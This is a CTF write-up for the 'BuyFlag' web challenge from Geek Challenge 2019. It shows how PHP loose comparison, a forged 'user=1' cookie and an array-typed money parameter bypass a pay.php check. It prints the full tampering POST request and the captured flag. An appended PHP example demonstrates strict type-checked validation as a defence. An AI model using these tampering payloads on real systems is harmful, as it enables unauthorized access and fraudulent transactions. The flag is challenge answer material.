[Geek Challenge 2019] BuyFlag 1

Posted by TazmiDev on 2024-11-08


Opening the instance reveals a pay.php page that contains hints.


Viewing the page source reveals the logic that handles the password POST parameter.


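Intercept the request with Burp Suite and pass the money and password parameters. The password is checked with a loose == comparison, so appending one character is enough to bypass it.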

password=404a&money=100000000


The response shows no change.

Note that the buyer must be a CUIT student (Only Cuit's students can buy the FLAG)


Try modifying the request headers, changing the cookie used for verification to 1 (0 = false, 1 = true).


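The identity check was bypassed successfully (for some reason Burp kept reporting on my side that the password was not being passed), so I switched to HackBar to submit the request. It now shows that the password is correct and the identity check passes, but the money is wrong; I suspect a length problem. (you have not enough money,loser~)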


Using an array bypass, the flag is obtained successfully.

password=404a&money[]=100000000


flag{46a2d632-843d-41bf-9a8a-42aac15baf18}

Final payload

POST /pay.php HTTP/1.1
Host: 8cb0e35d-dad9-4a41-86ca-b4cfdf800dd8.node5.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Origin: http://8cb0e35d-dad9-4a41-86ca-b4cfdf800dd8.node5.buuoj.cn:81
Connection: keep-alive
Referer: http://8cb0e35d-dad9-4a41-86ca-b4cfdf800dd8.node5.buuoj.cn:81/pay.php
Cookie: user=1
Upgrade-Insecure-Requests: 1
Priority: u=0, i

password=404a&money[]=100000000
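
On the defensive side, the PHP below is an added example, not the challenge's code or part of the original post: it puts the loose == password check described above next to type-checked validation that rejects both 404a and money[]. The secret '404', the price, the 12-digit limit and the function names are assumptions.

```php
<?php
// Added example: hypothetical validation for a pay.php-style form.
// Field names password/money come from the write-up; the constants and
// function names below are assumptions made for illustration.

const PRICE = 100000000;          // assumed price (the amount submitted above)
const EXPECTED_PASSWORD = '404';  // assumed secret

// Loose check as described in the write-up. On PHP 5/7 the string "404a"
// is cast to the integer 404 before comparing, so this returns true.
// PHP 8 compares "404" with "404a" as strings and returns false.
function loose_password_ok($password): bool
{
    return $password == 404;
}

// Strict check: only a string is accepted, compared byte for byte.
function strict_password_ok($password): bool
{
    return is_string($password) && hash_equals(EXPECTED_PASSWORD, $password);
}

// Strict amount check: rejects arrays (money[]=...), signs, exponents
// and over-long input before any numeric comparison takes place.
function strict_money_ok($money): bool
{
    if (!is_string($money) || !ctype_digit($money) || strlen($money) > 12) {
        return false;
    }
    return (int) $money >= PRICE;
}

// Constructed sample inputs, shaped the way PHP parses a form body into $_POST.
$samples = [
    ['password' => '404a', 'money' => ['100000000']], // shape of the final payload
    ['password' => '404a', 'money' => '100000000'],
    ['password' => '404',  'money' => '1e9'],
    ['password' => '404',  'money' => '100000000'],
];

foreach ($samples as $post) {
    printf(
        "%-45s loose_pw=%d strict_pw=%d strict_money=%d\n",
        json_encode($post),
        loose_password_ok($post['password']),
        strict_password_ok($post['password']),
        strict_money_ok($post['money'])
    );
}
```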
